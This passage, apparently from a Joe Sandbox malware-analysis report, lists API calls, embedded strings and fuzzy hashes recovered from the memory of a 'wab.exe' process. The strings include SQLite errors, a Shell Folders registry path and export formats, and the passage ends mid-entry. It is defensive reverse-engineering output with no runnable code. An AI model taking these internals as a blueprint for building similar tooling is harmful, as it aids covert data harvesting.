                                            • memset.MSVCRT ref: 00405455
                                            • memset.MSVCRT ref: 0040546C
                                            • memset.MSVCRT ref: 00405483
                                            • memcpy.MSVCRT ref: 00405498
                                            • memcpy.MSVCRT ref: 004054AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$memcpy$ErrorLast
                                            • String ID: 6$\
                                            • API String ID: 404372293-1284684873
                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                            • wcscpy.MSVCRT ref: 0040A0D9
                                            • wcscat.MSVCRT ref: 0040A0E6
                                            • wcscat.MSVCRT ref: 0040A0F5
                                            • wcscpy.MSVCRT ref: 0040A107
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                            • String ID:
                                            • API String ID: 1331804452-0
                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                            APIs
                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                            • String ID: advapi32.dll
                                            • API String ID: 2012295524-4050573280
                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                            APIs
                                            Strings
                                            • <%s>, xrefs: 004100A6
                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf
                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                            • API String ID: 3473751417-2880344631
                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset
                                            • String ID: %2.2X
                                            • API String ID: 2521778956-791839006
                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscpy
                                            • String ID: dialog_%d$general$menu_%d$strings
                                            • API String ID: 999028693-502967061
                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memsetstrlen
                                            • String ID:
                                            • API String ID: 2350177629-0
                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                            • API String ID: 2221118986-1606337402
                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                            • String ID:
                                            • API String ID: 265355444-0
                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                            APIs
                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                              • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                            • memset.MSVCRT ref: 0040C439
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                            • memset.MSVCRT ref: 0040C4D0
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                            • String ID:
                                            • API String ID: 1973883786-0
                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                            APIs
                                            • memset.MSVCRT ref: 004116FF
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2618321458-3614832568
                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                            APIs
                                            • memset.MSVCRT ref: 004185FC
                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@AttributesFilememset
                                            • String ID:
                                            • API String ID: 776155459-0
                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                            • malloc.MSVCRT ref: 00417524
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                            • String ID:
                                            • API String ID: 2308052813-0
                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                            APIs
                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PathTemp$??3@
                                            • String ID: %s\etilqs_$etilqs_
                                            • API String ID: 1589464350-1420421710
                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                            APIs
                                            • memset.MSVCRT ref: 0040FDD5
                                              • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                            • String ID: <%s>%s</%s>$</item>$<item>
                                            • API String ID: 1775345501-2769808009
                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                            APIs
                                            • wcscpy.MSVCRT ref: 0041477F
                                            • wcscpy.MSVCRT ref: 0041479A
                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscpy$CloseCreateFileHandle
                                            • String ID: General
                                            • API String ID: 999786162-26480598
                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLastMessage_snwprintf
                                            • String ID: Error$Error %d: %s
                                            • API String ID: 313946961-1552265934
                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: foreign key constraint failed$new$oid$old
                                            • API String ID: 0-1953309616
                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                            APIs
                                            Strings
                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                            • API String ID: 3510742995-272990098
                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: gj
                                            • API String ID: 1297977491-4203073231
                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                            • malloc.MSVCRT ref: 004174BD
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                            • String ID:
                                            • API String ID: 2903831945-0
                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                            APIs
                                            • GetParent.USER32(?), ref: 0040D453
                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                            • memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                            • String ID:
                                            • API String ID: 1471605966-0
                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
